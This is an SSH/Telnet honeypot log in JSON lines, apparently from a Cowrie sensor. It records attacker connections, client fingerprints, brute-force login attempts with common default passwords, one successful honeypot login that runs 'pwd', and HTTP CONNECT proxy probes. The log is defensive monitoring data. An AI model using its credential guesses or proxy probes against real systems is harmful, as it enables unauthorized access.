{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47884,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3ab10943d23","protocol":"ssh","message":"New connection: 212.227.235.229:47884 (1.2.3.4:22) [session: d3ab10943d23]","sensor":"my-vps","timestamp":"2025-08-28T20:13:59.704976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:13:59.734942Z","src_ip":"212.227.235.229","session":"d3ab10943d23"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T20:14:00.692144Z","src_ip":"212.227.235.229","session":"d3ab10943d23"}
{"eventid":"cowrie.login.failed","username":"webmin","password":"123456","message":"login attempt [webmin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T20:14:01.075051Z","src_ip":"212.227.235.229","session":"d3ab10943d23"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:14:02.179019Z","src_ip":"212.227.235.229","session":"d3ab10943d23"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T20:14:02.653538Z","src_ip":"201.148.180.50","session":"ec3b7808e4e3"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.79.179","src_port":42410,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7eb91d46908","protocol":"ssh","message":"New connection: 139.59.79.179:42410 (1.2.3.4:22) [session: b7eb91d46908]","sensor":"my-vps","timestamp":"2025-08-28T20:14:03.591494Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:14:03.856092Z","src_ip":"139.59.79.179","session":"b7eb91d46908"}
{"eventid":"cowrie.session.closed","duration":"12.8","message":"Connection lost after 12.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:14:05.569505Z","src_ip":"201.148.180.50","session":"ec3b7808e4e3"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":56490,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc0329174c30","protocol":"ssh","message":"New connection: 80.94.95.112:56490 (1.2.3.4:22) [session: cc0329174c30]","sensor":"my-vps","timestamp":"2025-08-28T20:14:12.900247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T20:14:12.901500Z","src_ip":"80.94.95.112","session":"cc0329174c30"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T20:14:12.933275Z","src_ip":"80.94.95.112","session":"cc0329174c30"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26111979","message":"login attempt [admin/26111979] failed","sensor":"my-vps","timestamp":"2025-08-28T20:14:13.139283Z","src_ip":"80.94.95.112","session":"cc0329174c30"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26091980","message":"login attempt [admin/26091980] failed","sensor":"my-vps","timestamp":"2025-08-28T20:14:14.172464Z","src_ip":"80.94.95.112","session":"cc0329174c30"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26071993","message":"login attempt [admin/26071993] failed","sensor":"my-vps","timestamp":"2025-08-28T20:14:15.204730Z","src_ip":"80.94.95.112","session":"cc0329174c30"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26061988","message":"login attempt [admin/26061988] failed","sensor":"my-vps","timestamp":"2025-08-28T20:14:16.238014Z","src_ip":"80.94.95.112","session":"cc0329174c30"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26061984","message":"login attempt [admin/26061984] failed","sensor":"my-vps","timestamp":"2025-08-28T20:14:17.271594Z","src_ip":"80.94.95.112","session":"cc0329174c30"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:14:18.305172Z","src_ip":"80.94.95.112","session":"cc0329174c30"}
{"eventid":"cowrie.session.connect","src_ip":"223.18.41.232","src_port":51332,"dst_ip":"1.2.3.4","dst_port":23,"session":"63a5f96b8ff1","protocol":"telnet","message":"New connection: 223.18.41.232:51332 (1.2.3.4:23) [session: 63a5f96b8ff1]","sensor":"my-vps","timestamp":"2025-08-28T20:14:32.797116Z"}
{"eventid":"cowrie.session.connect","src_ip":"223.18.41.232","src_port":51337,"dst_ip":"1.2.3.4","dst_port":23,"session":"295627dff83f","protocol":"telnet","message":"New connection: 223.18.41.232:51337 (1.2.3.4:23) [session: 295627dff83f]","sensor":"my-vps","timestamp":"2025-08-28T20:14:34.014886Z"}
{"eventid":"cowrie.session.connect","src_ip":"223.18.41.232","src_port":51333,"dst_ip":"1.2.3.4","dst_port":23,"session":"462c73b04655","protocol":"telnet","message":"New connection: 223.18.41.232:51333 (1.2.3.4:23) [session: 462c73b04655]","sensor":"my-vps","timestamp":"2025-08-28T20:14:34.017437Z"}
{"eventid":"cowrie.session.connect","src_ip":"223.18.41.232","src_port":51338,"dst_ip":"1.2.3.4","dst_port":23,"session":"498ff5e4df02","protocol":"telnet","message":"New connection: 223.18.41.232:51338 (1.2.3.4:23) [session: 498ff5e4df02]","sensor":"my-vps","timestamp":"2025-08-28T20:14:34.799273Z"}
{"eventid":"cowrie.session.closed","duration":8.442738056182861,"message":"Connection lost after 8 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:14:42.457529Z","src_ip":"223.18.41.232","session":"295627dff83f"}
{"eventid":"cowrie.session.closed","duration":8.222407579421997,"message":"Connection lost after 8 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:14:43.021593Z","src_ip":"223.18.41.232","session":"498ff5e4df02"}
{"eventid":"cowrie.session.closed","duration":12.117630004882812,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:14:46.134992Z","src_ip":"223.18.41.232","session":"462c73b04655"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55910,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9623e4bd681","protocol":"ssh","message":"New connection: 217.72.205.35:55910 (1.2.3.4:22) [session: a9623e4bd681]","sensor":"my-vps","timestamp":"2025-08-28T20:15:22.360666Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:15:22.361762Z","src_ip":"217.72.205.35","session":"a9623e4bd681"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":49578,"dst_ip":"1.2.3.4","dst_port":23,"session":"e17e22f4736e","protocol":"telnet","message":"New connection: 123.31.39.100:49578 (1.2.3.4:23) [session: e17e22f4736e]","sensor":"my-vps","timestamp":"2025-08-28T20:16:07.584306Z"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":38173,"dst_ip":"1.2.3.4","dst_port":23,"session":"e95682e9ad28","protocol":"telnet","message":"New connection: 123.31.39.100:38173 (1.2.3.4:23) [session: e95682e9ad28]","sensor":"my-vps","timestamp":"2025-08-28T20:16:08.643366Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48222,"dst_ip":"1.2.3.4","dst_port":23,"session":"5fb15067ae65","protocol":"telnet","message":"New connection: 212.227.235.229:48222 (1.2.3.4:23) [session: 5fb15067ae65]","sensor":"my-vps","timestamp":"2025-08-28T20:16:10.777542Z"}
{"eventid":"cowrie.session.closed","duration":120.02085041999817,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:16:32.817896Z","src_ip":"223.18.41.232","session":"63a5f96b8ff1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f5758c64505","protocol":"ssh","message":"New connection: 212.227.125.160:51824 (1.2.3.4:22) [session: 7f5758c64505]","sensor":"my-vps","timestamp":"2025-08-28T20:16:40.760406Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:16:40.829750Z","src_ip":"212.227.125.160","session":"7f5758c64505"}
{"eventid":"cowrie.session.closed","duration":46.233765602111816,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:16:53.818005Z","src_ip":"123.31.39.100","session":"e17e22f4736e"}
{"eventid":"cowrie.session.closed","duration":46.18760824203491,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:16:54.830876Z","src_ip":"123.31.39.100","session":"e95682e9ad28"}
{"eventid":"cowrie.session.closed","duration":46.1235625743866,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:16:56.901042Z","src_ip":"212.227.235.229","session":"5fb15067ae65"}
{"eventid":"cowrie.session.connect","src_ip":"109.58.80.3","src_port":43413,"dst_ip":"1.2.3.4","dst_port":23,"session":"827fd3904c81","protocol":"telnet","message":"New connection: 109.58.80.3:43413 (1.2.3.4:23) [session: 827fd3904c81]","sensor":"my-vps","timestamp":"2025-08-28T20:17:08.834983Z"}
{"eventid":"cowrie.session.closed","duration":13.258055448532104,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:17:22.092968Z","src_ip":"109.58.80.3","session":"827fd3904c81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44258,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f93d090e7c9","protocol":"ssh","message":"New connection: 212.227.125.160:44258 (1.2.3.4:22) [session: 2f93d090e7c9]","sensor":"my-vps","timestamp":"2025-08-28T20:17:33.089548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:17:34.145113Z","src_ip":"212.227.125.160","session":"2f93d090e7c9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:17:34.145834Z","src_ip":"212.227.125.160","session":"2f93d090e7c9"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:17:40.932418Z","src_ip":"212.227.125.160","session":"2f93d090e7c9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:17:44.173284Z","src_ip":"212.227.125.160","session":"2f93d090e7c9"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-28T20:17:44.174128Z","src_ip":"212.227.125.160","session":"2f93d090e7c9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"2.3","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:17:46.515829Z","src_ip":"212.227.125.160","session":"2f93d090e7c9"}
{"eventid":"cowrie.session.closed","duration":"13.4","message":"Connection lost after 13.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:17:46.520979Z","src_ip":"212.227.125.160","session":"2f93d090e7c9"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":53232,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e2a69c7672b","protocol":"ssh","message":"New connection: 201.148.180.50:53232 (1.2.3.4:22) [session: 3e2a69c7672b]","sensor":"my-vps","timestamp":"2025-08-28T20:17:46.666142Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:17:48.438944Z","src_ip":"201.148.180.50","session":"3e2a69c7672b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63437,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a3c24a83dd2","protocol":"ssh","message":"New connection: 212.227.125.160:63437 (1.2.3.4:22) [session: 6a3c24a83dd2]","sensor":"my-vps","timestamp":"2025-08-28T20:18:05.330997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T20:18:05.331944Z","src_ip":"212.227.125.160","session":"6a3c24a83dd2"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T20:18:05.412129Z","src_ip":"212.227.125.160","session":"6a3c24a83dd2"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-28T20:18:05.824171Z","src_ip":"212.227.125.160","session":"6a3c24a83dd2"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abc123","message":"login attempt [testuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T20:18:06.907446Z","src_ip":"212.227.125.160","session":"6a3c24a83dd2"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abcd123","message":"login attempt [testuser/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T20:18:07.989427Z","src_ip":"212.227.125.160","session":"6a3c24a83dd2"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abcd1234","message":"login attempt [testuser/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T20:18:09.071559Z","src_ip":"212.227.125.160","session":"6a3c24a83dd2"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abc1234","message":"login attempt [testuser/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T20:18:10.155008Z","src_ip":"212.227.125.160","session":"6a3c24a83dd2"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:18:11.237465Z","src_ip":"212.227.125.160","session":"6a3c24a83dd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":13196,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c794bab3e26","protocol":"ssh","message":"New connection: 212.227.125.160:13196 (1.2.3.4:22) [session: 5c794bab3e26]","sensor":"my-vps","timestamp":"2025-08-28T20:21:15.059560Z"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:21:15.861306Z","src_ip":"212.227.125.160","session":"5c794bab3e26"}
{"eventid":"cowrie.session.connect","src_ip":"103.110.81.140","src_port":50706,"dst_ip":"1.2.3.4","dst_port":23,"session":"3e406776329c","protocol":"telnet","message":"New connection: 103.110.81.140:50706 (1.2.3.4:23) [session: 3e406776329c]","sensor":"my-vps","timestamp":"2025-08-28T20:21:17.214129Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":13198,"dst_ip":"1.2.3.4","dst_port":22,"session":"5901b34edea6","protocol":"ssh","message":"New connection: 212.227.125.160:13198 (1.2.3.4:22) [session: 5901b34edea6]","sensor":"my-vps","timestamp":"2025-08-28T20:21:17.293170Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52054,"dst_ip":"1.2.3.4","dst_port":22,"session":"f72aa9cc9fab","protocol":"ssh","message":"New connection: 212.227.125.160:52054 (1.2.3.4:22) [session: f72aa9cc9fab]","sensor":"my-vps","timestamp":"2025-08-28T20:21:21.664027Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52062,"dst_ip":"1.2.3.4","dst_port":22,"session":"a002ef661bb5","protocol":"ssh","message":"New connection: 212.227.125.160:52062 (1.2.3.4:22) [session: a002ef661bb5]","sensor":"my-vps","timestamp":"2025-08-28T20:21:24.803787Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 45.221.64.243:80 HTTP/1.0","message":"Remote SSH version: CONNECT 45.221.64.243:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T20:21:25.726398Z","src_ip":"212.227.125.160","session":"a002ef661bb5"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:21:25.727518Z","src_ip":"212.227.125.160","session":"a002ef661bb5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33398,"dst_ip":"1.2.3.4","dst_port":22,"session":"3163e0b077ce","protocol":"ssh","message":"New connection: 212.227.125.160:33398 (1.2.3.4:22) [session: 3163e0b077ce]","sensor":"my-vps","timestamp":"2025-08-28T20:21:31.504602Z"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:21:32.638985Z","src_ip":"212.227.125.160","session":"3163e0b077ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33410,"dst_ip":"1.2.3.4","dst_port":22,"session":"a55020d3363f","protocol":"ssh","message":"New connection: 212.227.125.160:33410 (1.2.3.4:22) [session: a55020d3363f]","sensor":"my-vps","timestamp":"2025-08-28T20:21:35.346351Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 45.221.64.243:80 HTTP/1.0","message":"Remote SSH version: CONNECT 45.221.64.243:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T20:21:36.437791Z","src_ip":"212.227.125.160","session":"a55020d3363f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:21:36.439038Z","src_ip":"212.227.125.160","session":"a55020d3363f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44372,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3b586439176","protocol":"ssh","message":"New connection: 212.227.125.160:44372 (1.2.3.4:22) [session: d3b586439176]","sensor":"my-vps","timestamp":"2025-08-28T20:21:38.713446Z"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:21:39.903739Z","src_ip":"212.227.125.160","session":"d3b586439176"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44380,"dst_ip":"1.2.3.4","dst_port":22,"session":"caabfdedc8c3","protocol":"ssh","message":"New connection: 212.227.125.160:44380 (1.2.3.4:22) [session: caabfdedc8c3]","sensor":"my-vps","timestamp":"2025-08-28T20:21:41.794053Z"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:21:42.716921Z","src_ip":"212.227.125.160","session":"caabfdedc8c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44386,"dst_ip":"1.2.3.4","dst_port":22,"session":"34ebf23700a5","protocol":"ssh","message":"New connection: 212.227.125.160:44386 (1.2.3.4:22) [session: 34ebf23700a5]","sensor":"my-vps","timestamp":"2025-08-28T20:21:44.659724Z"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:21:45.296451Z","src_ip":"212.227.125.160","session":"34ebf23700a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44392,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ddff58b271a","protocol":"ssh","message":"New connection: 212.227.125.160:44392 (1.2.3.4:22) [session: 9ddff58b271a]","sensor":"my-vps","timestamp":"2025-08-28T20:21:47.017902Z"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:21:49.133696Z","src_ip":"212.227.125.160","session":"9ddff58b271a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33976,"dst_ip":"1.2.3.4","dst_port":22,"session":"f44a330acb5a","protocol":"ssh","message":"New connection: 212.227.125.160:33976 (1.2.3.4:22) [session: f44a330acb5a]","sensor":"my-vps","timestamp":"2025-08-28T20:21:52.043769Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33980,"dst_ip":"1.2.3.4","dst_port":22,"session":"38106bd30e3f","protocol":"ssh","message":"New connection: 212.227.125.160:33980 (1.2.3.4:22) [session: 38106bd30e3f]","sensor":"my-vps","timestamp":"2025-08-28T20:21:56.052826Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 45.221.64.243:80 HTTP/1.0","message":"Remote SSH version: CONNECT 45.221.64.243:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T20:21:56.851361Z","src_ip":"212.227.125.160","session":"38106bd30e3f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:21:56.852731Z","src_ip":"212.227.125.160","session":"38106bd30e3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":27770,"dst_ip":"1.2.3.4","dst_port":22,"session":"39ef43a065e4","protocol":"ssh","message":"New connection: 212.227.125.160:27770 (1.2.3.4:22) [session: 39ef43a065e4]","sensor":"my-vps","timestamp":"2025-08-28T20:21:59.140136Z"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:22:00.206067Z","src_ip":"212.227.125.160","session":"39ef43a065e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":27780,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5be2410e838","protocol":"ssh","message":"New connection: 212.227.125.160:27780 (1.2.3.4:22) [session: a5be2410e838]","sensor":"my-vps","timestamp":"2025-08-28T20:22:02.488794Z"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:22:03.686813Z","src_ip":"212.227.125.160","session":"a5be2410e838"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63512,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2c69818ebb5","protocol":"ssh","message":"New connection: 217.72.205.35:63512 (1.2.3.4:22) [session: e2c69818ebb5]","sensor":"my-vps","timestamp":"2025-08-28T20:22:04.612985Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:22:04.614104Z","src_ip":"217.72.205.35","session":"e2c69818ebb5"}
